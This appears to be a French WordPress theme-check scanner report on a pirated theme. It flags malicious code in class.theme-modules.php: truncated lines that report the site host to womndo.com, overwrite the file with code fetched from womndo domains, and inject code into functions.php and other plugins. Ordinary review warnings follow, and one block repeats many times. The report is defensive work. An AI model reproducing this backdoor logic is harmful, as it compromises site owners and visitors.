file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC
  5. Code malveillant : Opérations réseau curl_init trouvé dans le fichier SlackbotHandler.php. 72: $ch = curl_init();curl_init trouvé dans le fichier MandrillHandler.php. 55: $ch = curl_init();curl_init trouvé dans le fichier CubeHandler.php. 91: $this->httpConnection = curl_init('http://'.$this->host.':'.$this->port.'/1.0/event/put');curl_init trouvé dans le fichier LogglyHandler.php. 87: $ch = curl_init();curl_init trouvé dans le fichier IFTTTHandler.php. 58: $ch = curl_init();curl_init trouvé dans le fichier SlackWebhookHandler.php. 83: $ch = curl_init();fsockopen trouvé dans le fichier SocketHandler.php. 17: * Stores to any socket - uses fsockopen() or pfsockopen().20: * @see http://php.net/manual/en/function.fsockopen.php98: * @see http://php.net/manual/en/function.fsockopen.php183: * UDP might appear to be connected but might fail when writing. See http://php.net/fsockopen for details.196: protected function pfsockopen()198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->204: protected function fsockopen()206: return @fsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->276: $resource = $this->pfsockopen();278: $resource = $this->fsockopen();pfsockopen trouvé dans le fichier SocketHandler.php. 17: * Stores to any socket - uses fsockopen() or pfsockopen().196: protected function pfsockopen()198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this-276: $resource = $this->pfsockopen();pfsockopen trouvé dans le fichier SocketHandler.php. 17: * Stores to any socket - uses fsockopen() or pfsockopen().196: protected function pfsockopen()198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this-276: $resource = $this->pfsockopen();pfsockopen trouvé dans le fichier SocketHandler.php. 17: * Stores to any socket - uses fsockopen() or pfsockopen().196: protected function pfsockopen()198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this-276: $resource = $this->pfsockopen();fsockopen trouvé dans le fichier SocketHandler.php. 17: * Stores to any socket - uses fsockopen() or pfsockopen().20: * @see http://php.net/manual/en/function.fsockopen.php98: * @see http://php.net/manual/en/function.fsockopen.php183: * UDP might appear to be connected but might fail when writing. See http://php.net/fsockopen for details.196: protected function pfsockopen()198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->204: protected function fsockopen()206: return @fsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->276: $resource = $this->pfsockopen();278: $resource = $this->fsockopen();fsockopen trouvé dans le fichier SocketHandler.php. 17: * Stores to any socket - uses fsockopen() or pfsockopen().20: * @see http://php.net/manual/en/function.fsockopen.php98: * @see http://php.net/manual/en/function.fsockopen.php183: * UDP might appear to be connected but might fail when writing. See http://php.net/fsockopen for details.196: protected function pfsockopen()198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->204: protected function fsockopen()206: return @fsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->276: $resource = $this->pfsockopen();278: $resource = $this->fsockopen();pfsockopen trouvé dans le fichier SocketHandler.php. 17: * Stores to any socket - uses fsockopen() or pfsockopen().196: protected function pfsockopen()198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this-276: $resource = $this->pfsockopen();fsockopen trouvé dans le fichier SocketHandler.php. 17: * Stores to any socket - uses fsockopen() or pfsockopen().20: * @see http://php.net/manual/en/function.fsockopen.php98: * @see http://php.net/manual/en/function.fsockopen.php183: * UDP might appear to be connected but might fail when writing. See http://php.net/fsockopen for details.196: protected function pfsockopen()198: return @pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->204: protected function fsockopen()206: return @fsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->276: $resource = $this->pfsockopen();278: $resource = $this->fsockopen();curl_exec trouvé dans le fichier Util.php. 35: if (curl_exec($ch) === false) {curl_init trouvé dans le fichier class.theme-modules.php. 414: $ch = curl_init();curl_exec trouvé dans le fichier class.theme-modules.php. 420: $data = curl_exec($ch);
  6. Menu Admin : Les thèmes doivent utiliser add_theme_page () pour ajouter des pages admin. Fichier class-merlin.php : 419: $this->hook_suffix = add_submenu_page(Fichier class.theme-modules.php : 34: add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin',
Attention
  1. tags du thème : Présence de tags inconnusLes thèmes qui utilisent le tag accessibility-ready doivent concoder avec les règles de la revue d'accessibilité.
    Voir https://make.wordpress.org/themes/handbook/review/accessibility/
    Tag inconnu custom-logo trouvé dans l'entête du fichier style.css.
  2. Text domain : Utilisation incorrecte des fonctions de traduction.Mauvaus répertoire d'installation pour le thème. Le nom du répertoir doit correspondre au slug du thème. Le slug de ce thème ainsi que le text-domain est hayley-raymond-shared-by-wptry-org.
  3. Text domain : Utilisation incorrecte des fonctions de traduction.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments 'Cannot import auto-draft posts' dans le fichier src/WXRImporter.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments 'Skipping attachment "%s", fetching attachments disabled' dans le fichier src/WXRImporter.php.Plusieurs text-domain sont utilisés dans le thème. Cela signifie que le thème n'est pas compatible avec les language packs de WordPress. Les domaines trouvés sont merlin-wp, wordpress-importer, hayley-raymond.
  4. Contextes de plugin : Fonctionnalités de pluginLe thème utilise la fonction register_taxonomy(). Cette fonction n'est pas prévue pour être utilisée dans le contexte d'un thème, mais plutôt dans un plugin.
  5. Uniformité des caractères de fin de ligne : Les fins de ligne DOS et UNIXLe fichier style.css contient un mélange de finde ligne \r\n and \n
  6. Eléments custom : Présence d'une entête customAucune référence à custom header n'a été trouvée dans le thème.
  7. Eléments custom : Présence d'un fond customAucune référence à custom background n'a été trouvée dans le thème.
  8. Editor style : Présence de l'édition de styleAucune référence à add_editor_style() n'a été trouvée dans le thème. Il est recommandé que le thème implémente l'édition de style, de manière à faire correspondre le contenu de l'éditeur l'affichage dans le thème.
  9. Implémentation de la date et de l'heure : Utilisation de the_time()Au moins une date codée en dur a été trouvée dans le fichier partial-post-meta.php. Il est préférable d'utiliser la fonction get_option( 'date_format' )à la place.Au moins une date codée en dur a été trouvée dans le fichier partial-project-meta.php. Il est préférable d'utiliser la fonction get_option( 'date_format' )à la place.Au moins une date codée en dur a été trouvée dans le fichier partial-post-meta.php. Il est préférable d'utiliser la fonction get_option( 'date_format' )à la place.
  10. Screenshot : Copie d'écranMauvaise extension de fichier screenshot ! Le fichier screenshot.png n'est pas un véritable fichier JPG. Le type détecté est : "image/png".
Info
  1. Fichiers optionnels : Présence du fichierde style pour les écritures de droite vers la gauche rtl.cssCe thème ne contient pas le fichier optionnel rtl.php.
  2. Fichiers optionnels : Présence du fichier-template fron-*page.phpCe thème ne contient pas le fichier optionnel front-page.php.
  3. Fichiers optionnels : Présence du fichier-template de page d'accueil home.phpCe thème ne contient pas le fichier optionnel home.php.
  4. Fichiers optionnels : Présence du fichier-template de catégorie category.phpCe thème ne contient pas le fichier optionnel category.php.
  5. Fichiers optionnels : Présence du fichier-template des tags tag.phpCe thème ne contient pas le fichier optionnel tag.php.
  6. Fichiers optionnels : Présence du fichier template de taxinomie taxonomy.phpCe thème ne contient pas le fichier optionnel taxonomy.php.
  7. Fichiers optionnels : Présence du fichier-template author.phpCe thème ne contient pas le fichier optionnel author.php.
  8. Fichiers optionnels : Présence de du fichier-template des dates et heures date.phpCe thème ne contient pas le fichier optionnel date.php.
  9. Fichiers optionnels : Présence du fichier-template des pièces jointes attachment.phpCe thème ne contient pas le fichier optionnel attachment.php.
  10. Fichiers optionnels : Présence du fichier-template des images image.phpCe thème ne contient pas le fichier optionnel image.php.
  11. Utilisation d'includes : Utilisation de include ou de de requireLe thème semble utiliser include ou require : class-merlin-customizer-importer.php 173: require_once( ABSPATH . 'wp-admin/includes/media.php' );174: require_once( ABSPATH . 'wp-admin/includes/file.php' );175: require_once( ABSPATH . 'wp-admin/includes/image.php' ); Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : class.theme-modules.php 221: include_once(ABSPATH . 'wp-includes/pluggable.php'); Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
Other checked themes